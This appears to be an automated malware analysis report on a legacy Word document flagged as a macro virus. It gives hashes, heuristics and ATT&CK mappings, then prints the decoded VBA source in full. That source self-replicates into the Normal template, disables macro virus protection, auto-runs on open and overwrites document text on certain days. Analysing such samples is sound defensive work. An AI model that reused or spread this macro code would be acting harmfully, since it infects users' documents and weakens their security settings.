Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a52706d2b6244927…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 38.5 KB
Created: 2003-11-20 14:02:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d3ae952d5d7bc0bdd2917f717696cf83
SHA-1: cda474373a463ecec4313d94f580c8ab860275cb
SHA-256: a52706d2b6244927decea0613e50a4640a8c463066705410a47f9b05df0bd61e
Risk Score: 196

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including the auto-execution entry points AutoOpen and Auto_Close, which are commonly used for malicious purposes. The 'sabath' macro exports its own VBA component to 'c:\sabath.drv' and re-imports it into the Normal template or the active document, indicating self-replication and persistence across other documents. The ClamAV detection as 'Win.Trojan.Pivis-2' further supports its malicious nature.

Heuristics (6)

  • ClamAV: Win.Trojan.Pivis-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Auto_Close macro [low] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Sub autoclose()
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 3836 bytes
    SHA-256: 5de78fe5dfb212805f42a0981c9be752363638f0e3f7ba9ecdd3fa95648870a8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "sabath"
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!
Sub ViewVBCode()
    On Error Resume Next
    Call sabath
End Sub
Sub sabath()
    
    
On Error Resume Next

Options.ConfirmConversions = False
Options.VirusProtection = False

'Áåäó íàCLICKàë...
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("sabath").Export "c:\sabath.drv"
ActiveDocument.ReadOnlyRecommended = False
'Håò ïîâåñòè ïå÷àëüíåå íà ñâåòå,÷åì ïîâåñòü î çàêëèíèâøåì RESETe...
chislo = Int(Rnd * 100)
'Hàãëîñòü - âòîðîå ñ÷àñòüå.
'À çîìáè çäåñü òèõèå
'À íå ïîéòè ëè ìíå íà ðàáîòó,- ïîäóìàë ÿ. È íå ïîøåë.
'Àëêîãîëü â ìàëûõ äîçàõ áåçâðåäåí â ëþáîì êîëè÷åñòâå!
'Àìåðèêàíöû - ìû èç íåãðîâ çâåçä íå äåëàåì
    If chislo = 99 Then MsgBox "Ïðèâåò VicodinES îò _\` /4 |3 /4 + |-|", vbSystemModal

If Day(Now()) = 1 Or 2 Or 3 Or 4 Or 5 Or 6 Or 13 Or 15 Or 17 Or 18 Or 19 Or 23 Or 25 Or 30 Or 31 Then Call Tooday

With Dialogs(wdDialogFileSummaryInfo)
'Hà õàëÿâó è "ÐÀÌÀ" - ñëèâî÷íîå ìàñëî.
    .Author = " _\` /4 |3 /4 + |-| "
    .Subject = "Viva VicodinES"
    .Comments = "_\` /4 |3 /4 + |-|   REproduction of Vic's XIXpoppy"
    .Execute
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!

End With
If NormalTemplate.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then TemplateNameCheck = True
If ActiveDocument.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then ActiveDocNameCheck = True
If TemplateNameCheck = True And ActiveDocNameCheck = False Then Set VIRIIconst = NormalTemplate.VBProject.VBComponents
If TemplateNameCheck = False And ActiveDocNameCheck = True Then Set VIRIIconst = ActiveDocument.VBProject.VBComponents
VIRIIconst.import "c:\sabath.drv"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If ActiveDocNameCheck = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
'MsgBox "   _\` /4 |3 /4 + |-| tribute to VicodinES "
IDontKnowWhatItWas:
End Sub
Sub HelpAbout()
    On Error Resume Next

    MsgBox " _\` /4 |3 /4 + |-|  ", vbInformation
End Sub
Sub AutoOpen()
    On Error Resume Next
    
ShowVisualBasicEditor = False 'net VB editora
    Call sabath

End Sub
Sub ToolsMacro()
    On Error Resume Next
    Call sabath
End Sub


Sub Tooday()
    On Error Resume Next
        Selection.HomeKey Unit:=wdStory
'Áåç òðóäà íå çàñóíåøü è òóäà.
'Áåðåãè åãî êàê çåíèöó - âî êàê.
        Selection.Find.ClearFormatting
        Selection.Find.Replacement.ClearFormatting
        With Selection.Find
            .Text = " îí "
            .Replacement.Text = "_\` /4 |3 /4 + |-|"
            .Forward = True
            .Wrap = wdFindContinue
            .Format = False
            .MatchCase = False
            .MatchWholeWord = False
            .MatchAllWordForms = True
        End With
        

        Selection.Find.Execute Replace:=wdReplaceAll
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub

Sub FileTemplates()
    On Error Resume Next
    With Application

    Call sabath
End Sub
'password for view is xx3
Sub autoclose()
On Error Resume Next
StatusBar = "Get Ur NEW AVir TODAY!!! _\` A |3 A T |-|"


End Sub